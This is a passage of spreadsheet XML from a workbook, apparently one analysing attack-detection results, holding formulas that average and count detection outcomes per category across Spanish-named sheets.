        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="M101" s="374">
        <f>'(D) - Análisis Resultados II - '!AR22</f>
        <v>0.6666666667</v>
      </c>
      <c r="N101" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K101)</f>
        <v>3</v>
      </c>
      <c r="O101" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P101" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q101" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T101" s="865" t="s">
        <v>822</v>
      </c>
      <c r="U101" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BC$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="V101" s="69">
        <v>0.6666666666666666</v>
      </c>
      <c r="W101" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T101)</f>
        <v>3</v>
      </c>
      <c r="X101" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y101" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z101" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB101" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC101" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD101" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="102">
      <c r="B102" s="806"/>
      <c r="C102" s="806"/>
      <c r="D102" s="871" t="s">
        <v>2765</v>
      </c>
      <c r="H102" s="806"/>
      <c r="I102" s="806"/>
      <c r="K102" s="352" t="s">
        <v>445</v>
      </c>
      <c r="L102" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M102" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AS22</f>
        <v>-</v>
      </c>
      <c r="N102" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K102)</f>
        <v>0</v>
      </c>
      <c r="O102" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P102" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q102" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T102" s="865" t="s">
        <v>445</v>
      </c>
      <c r="U102" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V102" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W102" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T102)</f>
        <v>0</v>
      </c>
      <c r="X102" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y102" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z102" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB102" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC102" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD102" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="103">
      <c r="B103" s="806"/>
      <c r="C103" s="806"/>
      <c r="H103" s="806"/>
      <c r="I103" s="806"/>
      <c r="K103" s="352" t="s">
        <v>1747</v>
      </c>
      <c r="L103" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BE$131)
</f>
        <v>1</v>
      </c>
      <c r="M103" s="374">
        <f>'(D) - Análisis Resultados II - '!AT22</f>
        <v>0</v>
      </c>
      <c r="N103" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K103)</f>
        <v>1</v>
      </c>
      <c r="O103" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P103" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q103" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T103" s="865" t="s">
        <v>1747</v>
      </c>
      <c r="U103" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BE$131)
</f>
        <v>1</v>
      </c>
      <c r="V103" s="69">
        <v>0.0</v>
      </c>
      <c r="W103" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T103)</f>
        <v>1</v>
      </c>
      <c r="X103" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y103" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z103" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB103" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC103" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD103" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="104">
      <c r="B104" s="806"/>
      <c r="C104" s="806"/>
      <c r="H104" s="806"/>
      <c r="I104" s="806"/>
      <c r="K104" s="352" t="s">
        <v>989</v>
      </c>
      <c r="L104" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BF$131)
</f>
        <v>0</v>
      </c>
      <c r="M104" s="374">
        <f>'(D) - Análisis Resultados II - '!AU22</f>
        <v>1</v>
      </c>
      <c r="N104" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K104)</f>
        <v>2</v>
      </c>
      <c r="O104" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P104" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q104" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T104" s="865" t="s">
        <v>989</v>
      </c>
      <c r="U104" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BF$131)
</f>
        <v>0</v>
      </c>
      <c r="V104" s="69">
        <v>1.0</v>
      </c>
      <c r="W104" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T104)</f>
        <v>2</v>
      </c>
      <c r="X104" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y104" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z104" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB104" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC104" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD104" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="105">
      <c r="B105" s="806"/>
      <c r="C105" s="806"/>
      <c r="H105" s="806"/>
      <c r="I105" s="806"/>
      <c r="K105" s="352" t="s">
        <v>246</v>
      </c>
      <c r="L105" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BG$131)
</f>
        <v>1</v>
      </c>
      <c r="M105" s="374">
        <f>'(D) - Análisis Resultados II - '!AV22</f>
        <v>1</v>
      </c>
      <c r="N105" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K105)</f>
        <v>1</v>
      </c>
      <c r="O105" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P105" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q105" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T105" s="865" t="s">
        <v>246</v>
      </c>
      <c r="U105" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BG$131)
</f>
        <v>1</v>
      </c>
      <c r="V105" s="69">
        <v>1.0</v>
      </c>
      <c r="W105" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T105)</f>
        <v>1</v>
      </c>
      <c r="X105" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y105" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z105" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB105" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC105" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD105" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="106">
      <c r="B106" s="806"/>
      <c r="C106" s="806"/>
      <c r="H106" s="806"/>
      <c r="I106" s="806"/>
      <c r="K106" s="352" t="s">
        <v>2242</v>
      </c>
      <c r="L106" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BH$131)
</f>
        <v>0</v>
      </c>
      <c r="M106" s="374">
        <f>'(D) - Análisis Resultados II - '!AW22</f>
        <v>1</v>
      </c>
      <c r="N106" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K106)</f>
        <v>1</v>
      </c>
      <c r="O106" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P106" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q106" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T106" s="865" t="s">
        <v>2242</v>
      </c>
      <c r="U106" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BH$131)
</f>
        <v>0</v>
      </c>
      <c r="V106" s="69">
        <v>1.0</v>
      </c>
      <c r="W106" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T106)</f>
        <v>1</v>
      </c>
      <c r="X106" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y106" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z106" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB106" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC106" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD106" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="107">
      <c r="B107" s="806"/>
      <c r="C107" s="806"/>
      <c r="H107" s="806"/>
      <c r="I107" s="806"/>
      <c r="K107" s="352" t="s">
        <v>1282</v>
      </c>
      <c r="L107" s="867">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BI$131)
</f>
        <v>0</v>
      </c>
      <c r="M107" s="374">
        <f>'(D) - Análisis Resultados II - '!AX22</f>
        <v>0</v>
      </c>
      <c r="N107" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K107)</f>
        <v>1</v>
      </c>
      <c r="O107" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P107" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q107" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T107" s="865" t="s">
        <v>1282</v>
      </c>
      <c r="U107" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BI$131)
</f>
        <v>0</v>
      </c>
      <c r="V107" s="69">
        <v>0.0</v>
      </c>
      <c r="W107" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T107)</f>
        <v>1</v>
      </c>
      <c r="X107" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y107" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z107" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB107" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC107" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD107" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="108">
      <c r="B108" s="806"/>
      <c r="C108" s="806"/>
      <c r="H108" s="806"/>
      <c r="I108" s="806"/>
      <c r="K108" s="352" t="s">
        <v>429</v>
      </c>
      <c r="L108" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M108" s="374">
        <f>'(D) - Análisis Resultados II - '!AY22</f>
        <v>1</v>
      </c>
      <c r="N108" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K108)</f>
        <v>1</v>
      </c>
      <c r="O108" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P108" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q108" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T108" s="865" t="s">
        <v>429</v>
      </c>
      <c r="U108" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V108" s="69">
        <v>1.0</v>
      </c>
      <c r="W108" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T108)</f>
        <v>1</v>
      </c>
      <c r="X108" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y108" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z108" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB108" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC108" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD108" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="109">
      <c r="B109" s="806"/>
      <c r="C109" s="806"/>
      <c r="H109" s="806"/>
      <c r="I109" s="806"/>
      <c r="K109" s="352" t="s">
        <v>912</v>
      </c>
      <c r="L109" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M109" s="374">
        <f>'(D) - Análisis Resultados II - '!AZ22</f>
        <v>1</v>
      </c>
      <c r="N109" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K109)</f>
        <v>1</v>
      </c>
      <c r="O109" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P109" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q109" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T109" s="865" t="s">
        <v>912</v>
      </c>
      <c r="U109" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V109" s="69">
        <v>0.0</v>
      </c>
      <c r="W109" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T109)</f>
        <v>1</v>
      </c>
      <c r="X109" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y109" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z109" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB109" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC109" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD109" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="110">
      <c r="B110" s="806"/>
      <c r="C110" s="806"/>
      <c r="H110" s="806"/>
      <c r="I110" s="806"/>
      <c r="K110" s="352" t="s">
        <v>1837</v>
      </c>
      <c r="L110" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BL$131)
</f>
        <v>1</v>
      </c>
      <c r="M110" s="374">
        <f>'(D) - Análisis Resultados II - '!BA22</f>
        <v>1</v>
      </c>
      <c r="N110" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K110)</f>
        <v>1</v>
      </c>
      <c r="O110" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P110" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q110" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T110" s="865" t="s">
        <v>1837</v>
      </c>
      <c r="U110" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BL$131)
</f>
        <v>1</v>
      </c>
      <c r="V110" s="69">
        <v>0.0</v>
      </c>
      <c r="W110" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T110)</f>
        <v>1</v>
      </c>
      <c r="X110" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y110" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z110" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB110" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC110" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD110" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="111">
      <c r="B111" s="806"/>
      <c r="C111" s="806"/>
      <c r="H111" s="806"/>
      <c r="I111" s="806"/>
      <c r="K111" s="352" t="s">
        <v>1510</v>
      </c>
      <c r="L111" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="M111" s="374">
        <f>'(D) - Análisis Resultados II - '!BB22</f>
        <v>0.3</v>
      </c>
      <c r="N111" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K111)</f>
        <v>10</v>
      </c>
      <c r="O111" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P111" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q111" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T111" s="865" t="s">
        <v>1510</v>
      </c>
      <c r="U111" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BM$131)
</f>
        <v>0.3593487395</v>
      </c>
      <c r="V111" s="69">
        <v>0.4</v>
      </c>
      <c r="W111" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T111)</f>
        <v>10</v>
      </c>
      <c r="X111" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y111" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z111" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB111" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC111" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD111" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="112">
      <c r="B112" s="806"/>
      <c r="C112" s="806"/>
      <c r="H112" s="806"/>
      <c r="I112" s="806"/>
      <c r="K112" s="352" t="s">
        <v>1411</v>
      </c>
      <c r="L112" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="M112" s="374">
        <f>'(D) - Análisis Resultados II - '!BC22</f>
        <v>0.375</v>
      </c>
      <c r="N112" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K112)</f>
        <v>8</v>
      </c>
      <c r="O112" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P112" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q112" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T112" s="865" t="s">
        <v>1411</v>
      </c>
      <c r="U112" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BN$131)
</f>
        <v>0.2501933114</v>
      </c>
      <c r="V112" s="69">
        <v>0.4997100328629422</v>
      </c>
      <c r="W112" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T112)</f>
        <v>8</v>
      </c>
      <c r="X112" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y112" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z112" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB112" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC112" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD112" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="113">
      <c r="B113" s="806"/>
      <c r="C113" s="806"/>
      <c r="H113" s="806"/>
      <c r="I113" s="806"/>
      <c r="K113" s="352" t="s">
        <v>1397</v>
      </c>
      <c r="L113" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M113" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BD22</f>
        <v>-</v>
      </c>
      <c r="N113" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K113)</f>
        <v>0</v>
      </c>
      <c r="O113" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P113" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q113" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T113" s="865" t="s">
        <v>1397</v>
      </c>
      <c r="U113" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V113" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W113" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T113)</f>
        <v>0</v>
      </c>
      <c r="X113" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y113" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z113" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB113" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC113" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD113" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="114">
      <c r="B114" s="806"/>
      <c r="C114" s="806"/>
      <c r="H114" s="806"/>
      <c r="I114" s="806"/>
      <c r="K114" s="352" t="s">
        <v>1374</v>
      </c>
      <c r="L114" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M114" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BE22</f>
        <v>-</v>
      </c>
      <c r="N114" s="859">
